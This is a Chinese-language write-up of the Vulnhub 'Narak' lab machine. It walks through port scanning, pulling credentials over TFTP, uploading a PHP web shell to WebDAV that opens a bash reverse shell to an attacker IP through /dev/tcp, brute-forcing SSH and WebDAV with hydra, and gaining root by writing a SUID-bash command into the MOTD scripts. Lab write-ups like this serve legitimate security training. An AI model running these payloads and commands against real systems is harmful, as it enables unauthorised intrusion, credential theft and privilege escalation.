Vulnhub narak

0x01：埠掃描

主機發現

nmap -sn 192.168.231.0/24

全埠掃描

nmap --min-rate 10000 -p- 192.168.231.143

22ssh，80http

UDP掃描

nmap -sU --top=20 192.168.231.143

有兩個埠開放

詳細埠掃描

nmap -sT -sC -sV -O --min-rate 10000 -p22,80 192.168.231.143

漏洞掃描

nmap --script=vuln -p22,80 192.168.231.143

0x02：tftp滲透

剛才我們掃描到UDP可能開放的埠為68，69

我們試試tftp埠是否開放

成功進入

因為tftp本身沒有內建的列出檔案功能，所以我們隨便get一個東西看報錯返回就能知道里面有什麼檔案了

看來他做了遮蔽

在下面的web滲透裡從tips.txt裡得知了檔名為creds.txt，我們get下來

拿到一串憑證yamdoot@Swarg

拿到憑證首先嚐試ssh

0x03：web滲透

先掃目錄

dirsearch -u http://192.168.231.143
gobuster dir -u http://192.168.231.143/ -x rar,zip,txt -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt 

掃到一個/tips.txt，看看

這提示我們了一個檔名為creds.txt，應該就是tftp裡的，把這一段放到上面去了

在/webdav有一個登入框

用我們剛才tftp滲透拿到的憑證嘗試登入

成功登入，但沒有任何檔案

上網查了查webdav這個webapp的利用，我們可以使用davtest檢視webdav的基本資訊，用cadaver連線webdav

我們首先用davtest檢視

davtest -url http://192.168.231.143/webdav/ -auth yamdoot:Swarg 

發現可以執行php命令，現在我們連線webdav傳馬

注意，我們這裡不能透過antsword連木馬反彈shell，因為這個網站的此目錄本身是無權訪問的

cadaver http://192.168.231.143

<?php exec('/bin/bash -c "bash -i >& /dev/tcp/192.168.231.138/4444 0>&1"')

我們反彈shell

0x04：許可權提升

提升tty

python -c "import pty; pty.spawn('/bin/bash')"

沒有python，換成script

script /dev/null

檢視使用者

cat /etc/passwd

發現了3個使用者

檢視可寫檔案

find / -type f -writable ! -path "/proc/*" 2>/dev/null

看到了這幾個可以檔案，先看hell.sh

得到一串brianfuck，我們破解

懷疑是密碼，我們試試

hydra -L user.txt -P pass.txt ssh://192.168.231.143 

我們橫向遷移

剛才我們檢視可寫檔案看到了motd，懷疑是motd提權，先看它有沒有root許可權

好的，我們寫馬反彈root許可權

0x05：反思總結

1.發現神的部落格是用cewl生成字典去打的webdav

cewl 192.168.231.143 -w 1.txt
hydra -L 1.txt -P 1.txt 192.168.231.143 http-get /webdav

2.motd提權除了反彈rootshell之外，還可以將我們的bash替換成root的bash

echo "cp /bin/bash /home/inferno/bash && chmod u+s /home/inferno/bash" >> /etc/update-motd.d/00-header
./bash -p